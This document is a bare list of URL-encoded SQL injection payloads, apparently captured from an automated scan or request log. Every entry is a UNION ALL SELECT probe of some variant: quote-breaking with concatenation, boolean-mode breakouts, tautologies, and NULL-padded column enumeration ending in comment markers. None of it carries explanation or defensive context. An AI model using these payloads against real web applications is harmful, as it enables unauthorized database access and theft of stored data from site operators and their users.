-7663%27%7C%7C%28SELECT%20%27Oeol%27%20WHERE%201895%3D1895%20UNION%20ALL%20SELECT%201895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%23 -8189%27%7C%7C%28SELECT%20%27cZGN%27%20WHERE%207558%3D7558%20UNION%20ALL%20SELECT%207558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%23 -5289%27%7C%7C%28SELECT%20%27ANwP%27%20WHERE%205532%3D5532%20UNION%20ALL%20SELECT%205532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%2C5532%23 -6884%27%7C%7C%28SELECT%20%27aZmV%27%20WHERE%206085%3D6085%20UNION%20ALL%20SELECT%206085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%23 -2300%27%2B%28SELECT%20SXms%20WHERE%203391%3D3391%20UNION%20ALL%20SELECT%203391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%23 -7273%27%2B%28SELECT%20tFTg%20WHERE%209683%3D9683%20UNION%20ALL%20SELECT%209683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%23 -6642%27%2B%28SELECT%20abat%20WHERE%202256%3D2256%20UNION%20ALL%20SELECT%202256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%23 -8321%27%2B%28SELECT%20bwgP%20WHERE%209549%3D9549%20UNION%20ALL%20SELECT%209549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%23 -1891%27%2B%28SELECT%20KGkw%20WHERE%202292%3D2292%20UNION%20ALL%20SELECT%202292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%23 -6836%27%2B%28SELECT%20BlmM%20WHERE%207732%3D7732%20UNION%20ALL%20SELECT%207732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%23 -8265%27%2B%28SELECT%20ZyuB%20WHERE%209428%3D9428%20UNION%20ALL%20SELECT%209428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%2C9428%23 -7292%27%2B%28SELECT%20ZhDV%20WHERE%208371%3D8371%20UNION%20ALL%20SELECT%208371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%2C8371%23 -4678%27%2B%28SELECT%20ggIR%20WHERE%203248%3D3248%20UNION%20ALL%20SELECT%203248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%2C3248%23 -8752%27%2B%28SELECT%20CgYz%20WHERE%206860%3D6860%20UNION%20ALL%20SELECT%206860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%23 -5812%27%2B%28SELECT%20%27RoOB%27%20WHERE%206401%3D6401%20UNION%20ALL%20SELECT%206401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%2C6401%23 -9320%27%2B%28SELECT%20%27dIGA%27%20WHERE%205885%3D5885%20UNION%20ALL%20SELECT%205885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%2C5885%23 -1245%27%2B%28SELECT%20%27TTES%27%20WHERE%208702%3D8702%20UNION%20ALL%20SELECT%208702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%23 -3372%27%2B%28SELECT%20%27jtef%27%20WHERE%202560%3D2560%20UNION%20ALL%20SELECT%202560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%23 -1838%27%2B%28SELECT%20%27byju%27%20WHERE%207497%3D7497%20UNION%20ALL%20SELECT%207497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%2C7497%23 -1797%27%2B%28SELECT%20%27ifnL%27%20WHERE%201409%3D1409%20UNION%20ALL%20SELECT%201409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%23 -5615%27%2B%28SELECT%20%27zHqU%27%20WHERE%204438%3D4438%20UNION%20ALL%20SELECT%204438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%23 -5161%27%2B%28SELECT%20%27QnwH%27%20WHERE%206972%3D6972%20UNION%20ALL%20SELECT%206972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%23 -6542%27%2B%28SELECT%20%27vIxi%27%20WHERE%201289%3D1289%20UNION%20ALL%20SELECT%201289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%23 -8950%27%2B%28SELECT%20%27qfAy%27%20WHERE%203645%3D3645%20UNION%20ALL%20SELECT%203645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%23 -5855%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%23 -1074%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%2C6224%23 -7570%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%23 -3581%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%23 -6002%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%23 -5267%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%2C6768%23 -1591%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%2C3807%23 -2459%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%23 -7060%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%23 -2659%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%2C8493%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 